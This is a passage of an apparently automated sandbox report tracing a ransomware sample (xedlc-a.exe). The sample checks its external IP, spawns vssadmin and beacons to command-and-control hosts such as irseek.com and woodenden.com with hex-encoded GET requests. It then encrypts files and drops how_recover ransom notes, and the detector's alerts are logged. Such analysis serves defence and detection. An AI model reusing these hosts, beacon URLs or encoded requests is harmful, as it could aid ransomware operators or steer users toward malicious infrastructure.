45729.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45730.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45731.             ads:
45732.           fid (ads:): 0
45733.           failure: open
45734.           ntstatus: 0xc0000034
45735.           CreateOptions: 0x200000
45736.           PE:
45737.             InspectionType: Ext
45738.         network:
45739.           timestamp: 63518
45740.           mode: dns_query
45741.           sequenceNumber: 668
45742.           processinfo:
45743.             tainted: true
45744.             pid: 1056
45745.             imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45746.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45747.           protocol_type: udp
45748.           qtype: Host Address
45749.           hostname: myexternalip.com
45750.         malicious-alert:
45751.           classtype: Network-Activity
45752.           weight: 0
45753.           ruleid: 5604 : Network outbound communication attempted ; Process attempting connections via dns_query
45754.           msg: Process attempting connections via dns_query
45755.           display-msg: Network outbound communication attempted
45756.         malicious-alert:
45757.           classtype: misc-anom
45758.           weight: 100
45759.           ruleid: 10098 : Persistance with Self Delete Activity ; Persistance with Self Delete Activity
45760.           msg: Persistance with Self Delete Activity
45761.           display-msg: Persistance with Self Delete Activity
45762.         network:
45763.           timestamp: 63651
45764.           mode: dns_query_answer
45765.           sequenceNumber: 669
45766.           processinfo:
45767.             tainted: true
45768.             pid: 1056
45769.             imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45770.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45771.           protocol_type: udp
45772.           dns_response_code: 0
45773.           hostname: myexternalip.com
45774.           answer_number: 1
45775.           ipaddress: 199.16.199.2
45776.         regkey:
45777.           timestamp: 63656
45778.           mode: added
45779.           sequenceNumber: 670
45780.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio
45781.           processinfo:
45782.             pid: 1412
45783.             imagepath: C:\WINDOWS\system32\vssadmin.exe
45784.             md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45785.         regkey:
45786.           timestamp: 63660
45787.           mode: added
45788.           sequenceNumber: 671
45789.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
45790.           processinfo:
45791.             pid: 1412
45792.             imagepath: C:\WINDOWS\system32\vssadmin.exe
45793.             md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45794.         regkey:
45795.           timestamp: 63664
45796.           mode: added
45797.           sequenceNumber: 672
45798.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
45799.           processinfo:
45800.             pid: 1412
45801.             imagepath: C:\WINDOWS\system32\vssadmin.exe
45802.             md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45803.         regkey:
45804.           timestamp: 63667
45805.           mode: added
45806.           sequenceNumber: 673
45807.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
45808.           processinfo:
45809.             pid: 1412
45810.             imagepath: C:\WINDOWS\system32\vssadmin.exe
45811.             md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45812.         regkey:
45813.           timestamp: 63668
45814.           mode: added
45815.           sequenceNumber: 674
45816.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
45817.           processinfo:
45818.             pid: 1412
45819.             imagepath: C:\WINDOWS\system32\vssadmin.exe
45820.             md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45821.         process:
45822.           timestamp: 63684
45823.           mode: opened
45824.           sequenceNumber: 675
45825.           desiredaccess: 0x02000030
45826.           ntstatus: 0x00000000
45827.           target:
45828.             processinfo:
45829.               pid: 1412
45830.               imagepath: C:\WINDOWS\system32\vssadmin.exe
45831.               md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45832.           source:
45833.             processinfo:
45834.               pid: 1056
45835.               imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45836.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45837.         network:
45838.           timestamp: 63753
45839.           mode: http_request
45840.           sequenceNumber: 676
45841.           processinfo:
45842.             tainted: true
45843.             pid: 1056
45844.             imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45845.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45846.           protocol_type: tcp
45847.           destination_port: 80
45848.           ipaddress: 199.16.199.2
45849.           http_request: GET /raw HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: myexternalip.com~~~~
45850.         apicall:
45851.           timestamp: 63759
45852.           sequenceNumber: 677
45853.           processinfo:
45854.             pid: 1056
45855.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45856.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45857.           dllname: kernel32.dll
45858.           apiname: GetSystemTime
45859.           address: 0x63004857
45860.           params:
45861.             param (id:1): 0x1cde148
45862.         apicall:
45863.           timestamp: 63759
45864.           sequenceNumber: 678
45865.           processinfo:
45866.             pid: 1056
45867.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45868.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45869.           dllname: kernel32.dll
45870.           apiname: SystemTimeToFileTime
45871.           address: 0x63004862
45872.           params:
45873.             param (id:1): 0x1cde148
45874.             param (id:2): 0x1cde17c
45875.         apicall:
45876.           timestamp: 63767
45877.           sequenceNumber: 679
45878.           processinfo:
45879.             pid: 1056
45880.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45881.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45882.           dllname: kernel32.dll
45883.           apiname: GetSystemDirectoryA
45884.           address: 0x76f28a9e
45885.           params:
45886.             param (id:1): 0x1cdc208
45887.             param (id:2): 260
45888.         network:
45889.           timestamp: 63774
45890.           mode: dns_query
45891.           sequenceNumber: 680
45892.           processinfo:
45893.             tainted: true
45894.             pid: 1056
45895.             imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45896.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45897.           protocol_type: udp
45898.           qtype: Host Address
45899.           hostname: irseek.com
45900.         network:
45901.           timestamp: 63784
45902.           mode: dns_query_answer
45903.           sequenceNumber: 681
45904.           processinfo:
45905.             tainted: true
45906.             pid: 1056
45907.             imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45908.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45909.           protocol_type: udp
45910.           dns_response_code: 0
45911.           hostname: irseek.com
45912.           answer_number: 1
45913.           ipaddress: 199.16.199.3
45914.         regkey:
45915.           randomized: true
45916.           mode: queryvalue
45917.           sequenceNumber: 682
45918.           timestamp: 63793
45919.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
45920.          processinfo:
45921.            pid: 1412
45922.            imagepath: C:\WINDOWS\system32\vssadmin.exe
45923.            md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45924.        network:
45925.          timestamp: 63838
45926.          mode: http_request
45927.          sequenceNumber: 683
45928.          processinfo:
45929.            tainted: true
45930.            pid: 1056
45931.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45932.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45933.          protocol_type: tcp
45934.          destination_port: 80
45935.          ipaddress: 199.16.199.3
45936.          http_request: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9F63EFB72FCDF5217D1E6D96F06E15D4E672C629E192C07D7C8F9BA6843020F2958FEAED748005792AABDF31037C8C08E HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: irseek.com~~Connection: Keep-Alive~~~~
45937.        apicall:
45938.          timestamp: 63850
45939.          sequenceNumber: 684
45940.          processinfo:
45941.            pid: 1056
45942.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45943.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45944.          dllname: kernel32.dll
45945.          apiname: GetSystemTime
45946.          address: 0x63004857
45947.          params:
45948.            param (id:1): 0x1cde148
45949.        apicall:
45950.          timestamp: 63854
45951.          sequenceNumber: 685
45952.          processinfo:
45953.            pid: 1056
45954.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45956.          dllname: kernel32.dll
45957.          apiname: SystemTimeToFileTime
45958.          address: 0x63004862
45959.          params:
45960.            param (id:1): 0x1cde148
45961.            param (id:2): 0x1cde17c
45962.        apicall:
45963.          timestamp: 63859
45964.          sequenceNumber: 686
45965.          processinfo:
45966.            pid: 1056
45967.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45968.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45969.          dllname: kernel32.dll
45970.          apiname: GetSystemDirectoryA
45971.          address: 0x76f28a9e
45972.          params:
45973.            param (id:1): 0x1cdc208
45974.            param (id:2): 260
45975.        network:
45976.          timestamp: 63866
45977.          mode: dns_query
45978.          sequenceNumber: 687
45979.          processinfo:
45980.            tainted: true
45981.            pid: 1056
45982.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45983.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45984.          protocol_type: udp
45985.          qtype: Host Address
45986.          hostname: djepola.com
45987.        network:
45988.          timestamp: 63880
45989.          mode: dns_query_answer
45990.          sequenceNumber: 688
45991.          processinfo:
45992.            tainted: true
45993.            pid: 1056
45994.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
45995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45996.          protocol_type: udp
45997.          dns_response_code: 0
45998.          hostname: djepola.com
45999.          answer_number: 1
46000.          ipaddress: 199.16.199.4
46001.        network:
46002.          timestamp: 63888
46003.          mode: http_request
46004.          sequenceNumber: 689
46005.          processinfo:
46006.            tainted: true
46007.            pid: 1056
46008.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46009.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46010.          protocol_type: tcp
46011.          destination_port: 80
46012.          ipaddress: 199.16.199.4
46013.          http_request: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A94E701C59E26AE09F9C25C4F5BA58B92BC0B439D0F7FE1305A29727C6F5471D962F04B11DA7BFE934C06A95F08161E52D HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: djepola.com~~Connection: Keep-Alive~~~~
46014.        apicall:
46015.          timestamp: 63899
46016.          sequenceNumber: 690
46017.          processinfo:
46018.            pid: 1056
46019.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46020.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46021.          dllname: kernel32.dll
46022.          apiname: GetSystemTime
46023.          address: 0x63004857
46024.          params:
46025.            param (id:1): 0x1cde148
46026.        apicall:
46027.          timestamp: 63902
46028.          sequenceNumber: 691
46029.          processinfo:
46030.            pid: 1056
46031.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46032.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46033.          dllname: kernel32.dll
46034.          apiname: SystemTimeToFileTime
46035.          address: 0x63004862
46036.          params:
46037.            param (id:1): 0x1cde148
46038.            param (id:2): 0x1cde17c
46039.        apicall:
46040.          timestamp: 63907
46041.          sequenceNumber: 692
46042.          processinfo:
46043.            pid: 1056
46044.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46045.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46046.          dllname: kernel32.dll
46047.          apiname: GetSystemDirectoryA
46048.          address: 0x76f28a9e
46049.          params:
46050.            param (id:1): 0x1cdc208
46051.            param (id:2): 260
46052.        network:
46053.          timestamp: 63914
46054.          mode: dns_query
46055.          sequenceNumber: 693
46056.          processinfo:
46057.            tainted: true
46058.            pid: 1056
46059.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46060.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46061.          protocol_type: udp
46062.          qtype: Host Address
46063.          hostname: aprenderabailarsevillanas.com
46064.        process:
46065.          timestamp: 63921
46066.          mode: terminated
46067.          sequenceNumber: 694
46068.          value: C:\WINDOWS\system32\vssadmin.exe
46069.          pid: 1412
46070.          ppid: 1056
46071.          parentname: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46072.          cmdline: N/A
46073.            ads:
46074.          fid (ads:): 281474976713206
46075.        network:
46076.          timestamp: 63926
46077.          mode: dns_query_answer
46078.          sequenceNumber: 695
46079.          processinfo:
46080.            tainted: true
46081.            pid: 1056
46082.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46083.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46084.          protocol_type: udp
46085.          dns_response_code: 0
46086.          hostname: aprenderabailarsevillanas.com
46087.          answer_number: 1
46088.          ipaddress: 199.16.199.5
46089.        network:
46090.          timestamp: 63939
46091.          mode: http_request
46092.          sequenceNumber: 696
46093.          processinfo:
46094.            tainted: true
46095.            pid: 1056
46096.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46097.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46098.          protocol_type: tcp
46099.          destination_port: 80
46100.          ipaddress: 199.16.199.5
46101.          http_request: GET /wp-content/uploads/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9BE2ABD2CB94BBE711C82A3574DD576B5CF604106D55E6F2BFE1D5A4A8056AE25C6ACCEE5C75320955910B98551B937D3BEE23BB4859D46B0B74354C1D39161C4 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: aprenderabailarsevillanas.com~~Connection: Keep-Alive~~~~
46102.        apicall:
46103.          timestamp: 63950
46104.          sequenceNumber: 697
46105.          processinfo:
46106.            pid: 1056
46107.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46108.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46109.          dllname: kernel32.dll
46110.          apiname: GetSystemTime
46111.          address: 0x63004857
46112.          params:
46113.            param (id:1): 0x1cde148
46114.        apicall:
46115.          timestamp: 63951
46116.          sequenceNumber: 698
46117.          processinfo:
46118.            pid: 1056
46119.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46121.          dllname: kernel32.dll
46122.          apiname: SystemTimeToFileTime
46123.          address: 0x63004862
46124.          params:
46125.            param (id:1): 0x1cde148
46126.            param (id:2): 0x1cde17c
46127.        apicall:
46128.          timestamp: 63959
46129.          sequenceNumber: 699
46130.          processinfo:
46131.            pid: 1056
46132.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46133.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46134.          dllname: kernel32.dll
46135.          apiname: GetSystemDirectoryA
46136.          address: 0x76f28a9e
46137.          params:
46138.            param (id:1): 0x1cdc208
46139.            param (id:2): 260
46140.        network:
46141.          timestamp: 63965
46142.          mode: dns_query
46143.          sequenceNumber: 700
46144.          processinfo:
46145.            tainted: true
46146.            pid: 1056
46147.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46148.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46149.          protocol_type: udp
46150.          qtype: Host Address
46151.          hostname: apotheke-stiepel.com
46152.        file:
46153.          timestamp: 63976
46154.          mode: find
46155.          sequenceNumber: 701
46156.          value: C:\*
46157.          processinfo:
46158.            pid: 1056
46159.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46161.          ntstatus: 0x0
46162.          CreateOptions: 0x0
46163.        apicall:
46164.          timestamp: 64086
46165.          sequenceNumber: 702
46166.          processinfo:
46167.            pid: 1056
46168.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46169.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46170.          dllname: kernel32.dll
46171.          apiname: GetSystemTime
46172.          address: 0x63004857
46173.          params:
46174.            param (id:1): 0x1cde148
46175.        apicall:
46176.          timestamp: 64090
46177.          sequenceNumber: 703
46178.          processinfo:
46179.            pid: 1056
46180.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46181.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46182.          dllname: kernel32.dll
46183.          apiname: SystemTimeToFileTime
46184.          address: 0x63004862
46185.          params:
46186.            param (id:1): 0x1cde148
46187.            param (id:2): 0x1cde17c
46188.        apicall:
46189.          timestamp: 64096
46190.          sequenceNumber: 704
46191.          processinfo:
46192.            pid: 1056
46193.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46194.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46195.          dllname: kernel32.dll
46196.          apiname: GetSystemDirectoryA
46197.          address: 0x76f28a9e
46198.          params:
46199.            param (id:1): 0x1cdc208
46200.            param (id:2): 260
46201.        network:
46202.          timestamp: 64135
46203.          mode: dns_query_answer
46204.          sequenceNumber: 705
46205.          processinfo:
46206.            tainted: true
46207.            pid: 1056
46208.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46209.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46210.          protocol_type: udp
46211.          dns_response_code: 0
46212.          hostname: apotheke-stiepel.com
46213.          answer_number: 1
46214.          ipaddress: 199.16.199.6
46215.        network:
46216.          timestamp: 64141
46217.          mode: http_request
46218.          sequenceNumber: 706
46219.          processinfo:
46220.            tainted: true
46221.            pid: 1056
46222.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46223.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46224.          protocol_type: tcp
46225.          destination_port: 80
46226.          ipaddress: 199.16.199.6
46227.          http_request: GET /tmp/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A982909206FBB4E8B8DEE345079095D6FACB7D276F50256ABE4A878A2BE0B4BE80AB1296199D73873F2F3AB9240C58A0E884D7CBF6FEDF363779116AE3704406F5 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: apotheke-stiepel.com~~Connection: Keep-Alive~~~~
46228.        network:
46229.          timestamp: 64168
46230.          mode: dns_query
46231.          sequenceNumber: 707
46232.          processinfo:
46233.            tainted: true
46234.            pid: 1056
46235.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46236.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46237.          protocol_type: udp
46238.          qtype: Host Address
46239.          hostname: woodenden.com
46240.        network:
46241.          timestamp: 64191
46242.          mode: dns_query_answer
46243.          sequenceNumber: 708
46244.          processinfo:
46245.            tainted: true
46246.            pid: 1056
46247.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46248.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46249.          protocol_type: udp
46250.          dns_response_code: 0
46251.          hostname: woodenden.com
46252.          answer_number: 1
46253.          ipaddress: 199.16.199.7
46254.        network:
46255.          timestamp: 64284
46256.          mode: http_request
46257.          sequenceNumber: 709
46258.          processinfo:
46259.            tainted: true
46260.            pid: 1056
46261.            imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
46262.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46263.          protocol_type: tcp
46264.          destination_port: 80
46265.          ipaddress: 199.16.199.7
46266.          http_request: GET /sysmisc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9528C52B38F260918A3043BBE6A78811A28D74C1407EE7F027502EBD14479D358D4046B9C1FD8982B78055D7999C8B76C HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: woodenden.com~~Connection: Keep-Alive~~~~
46267.        Ransom:
46268.          timestamp: 64319
46269.          sequenceNumber: 710
46270.          pattern: MC
46271.          value: C:\215WKsGLLMxQa1\GGaYah.txt
46272.          md5sum: 8f0185995a4a85019ecf7e15d3e35e05
46273.        malicious-alert:
46274.          classtype: Ransomware
46275.          weight: 0
46276.          ruleid: 8026 : Ransomware Activity ; Ransomware Activity
46277.          msg: Ransomware Activity
46278.          display-msg: Ransomware Activity
46279.        malicious-alert:
46280.          classtype: misc-anom
46281.          weight: 100
46282.          ruleid: 10077 : Ransomware Activity ;  Ransomware Activity
46283.          msg: Ransomware Activity
46284.          display-msg: Ransomware Activity
46285.        Ransom:
46286.          timestamp: 64401
46287.          sequenceNumber: 711
46288.          pattern: MC
46289.          value: C:\215WKsGLLMxQa1\GnHpYkZmI.doc
46290.          md5sum: c8b76c19ee0de57b34f122136d434ce9
46291.        apicall:
46292.          timestamp: 64600
46293.          repeat: 40
46294.          sequenceNumber: 712
46295.          processinfo:
46296.            pid: 1056
46297.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46298.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46299.          dllname: kernel32.dll
46300.          apiname: Sleep
46301.          address: 0x0041ed5b
46302.        Ransom:
46303.          timestamp: 64763
46304.          sequenceNumber: 713
46305.          pattern: MC
46306.          value: C:\215WKsGLLMxQa1\pkwPR.ppt
46307.          md5sum: 799a531f6c79837147b8b9bc0b78fb03
46308.        Ransom:
46309.          timestamp: 64882
46310.          sequenceNumber: 714
46311.          pattern: MC
46312.          value: C:\215WKsGLLMxQa1\Trtskn.jpg
46313.          md5sum: b8ffaa241d96ec3c8f0ccf5b492e8639
46314.        Ransom:
46315.          timestamp: 65119
46316.          sequenceNumber: 715
46317.          pattern: MC
46318.          value: C:\215WKsGLLMxQa1\WhjSVdR.xls
46319.          md5sum: efa5e2bb29bad2497d2d0fe524ab4675
46320.        Ransom:
46321.          timestamp: 65363
46322.          sequenceNumber: 716
46323.          pattern: MC
46324.          value: C:\215WKsGLLMxQa1\YnznjmIzF.png
46325.          md5sum: 27076679f4ca30abd9d21bf039200f69
46326.        file:
46327.          timestamp: 65395
46328.          mode: created
46329.          sequenceNumber: 717
46330.          value: C:\215WKsGLLMxQa1\how_recover+utm.txt
46331.          processinfo:
46332.            pid: 1056
46333.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46334.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46335.            ads:
46336.          fid (ads:): 1125899906910121
46337.          ntstatus: 0x0
46338.          CreateOptions: 0x60
46339.        file:
46340.          timestamp: 65400
46341.          mode: close
46342.          sequenceNumber: 718
46343.          value: C:\215WKsGLLMxQa1\how_recover+utm.txt
46344.          filesize: 2682
46345.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46346.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46347.          processinfo:
46348.            pid: 1056
46349.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46350.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46351.            ads:
46352.          fid (ads:): 1125899906910121
46353.          ntstatus: 0x0
46354.          CreateOptions: 0x0
46355.        file:
46356.          timestamp: 65407
46357.          mode: created
46358.          sequenceNumber: 719
46359.          value: C:\215WKsGLLMxQa1\how_recover+utm.html
46360.          processinfo:
46361.            pid: 1056
46362.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46363.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46364.            ads:
46365.          fid (ads:): 562949953488815
46366.          ntstatus: 0x0
46367.          CreateOptions: 0x60
46368.        file:
46369.          timestamp: 65412
46370.          mode: close
46371.          sequenceNumber: 720
46372.          value: C:\215WKsGLLMxQa1\how_recover+utm.html
46373.          filesize: 9495
46374.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46375.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46376.          processinfo:
46377.            pid: 1056
46378.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46380.            ads:
46381.          fid (ads:): 562949953488815
46382.          ntstatus: 0x0
46383.          CreateOptions: 0x0
46384.        Ransom:
46385.          timestamp: 65454
46386.          sequenceNumber: 721
46387.          pattern: MC
46388.          value: C:\9b9vmbghrNMdA2\B_mOVHLoox.jpg
46389.          md5sum: 980a526cf80358459ec855165596e154
46390.        Ransom:
46391.          timestamp: 65730
46392.          sequenceNumber: 722
46393.          pattern: MC
46394.          value: C:\9b9vmbghrNMdA2\Die-L.ppt
46395.          md5sum: 32b93875f6417c6c7ee1e62928537a79
46396.        Ransom:
46397.          timestamp: 65782
46398.          sequenceNumber: 723
46399.          pattern: MC
46400.          value: C:\9b9vmbghrNMdA2\mVvr-X.doc
46401.          md5sum: 6bf3ede98bab0f2d6a6f38ba63d68939
46402.        Ransom:
46403.          timestamp: 65879
46404.          sequenceNumber: 724
46405.          pattern: MC
46406.          value: C:\9b9vmbghrNMdA2\qhhhkCFk.xls
46407.          md5sum: d610d320106d97862dce6cb0157e2c03
46408.        file:
46409.          timestamp: 65915
46410.          mode: created
46411.          sequenceNumber: 725
46412.          value: C:\9b9vmbghrNMdA2\how_recover+utm.txt
46413.          processinfo:
46414.            pid: 1056
46415.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46416.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46417.            ads:
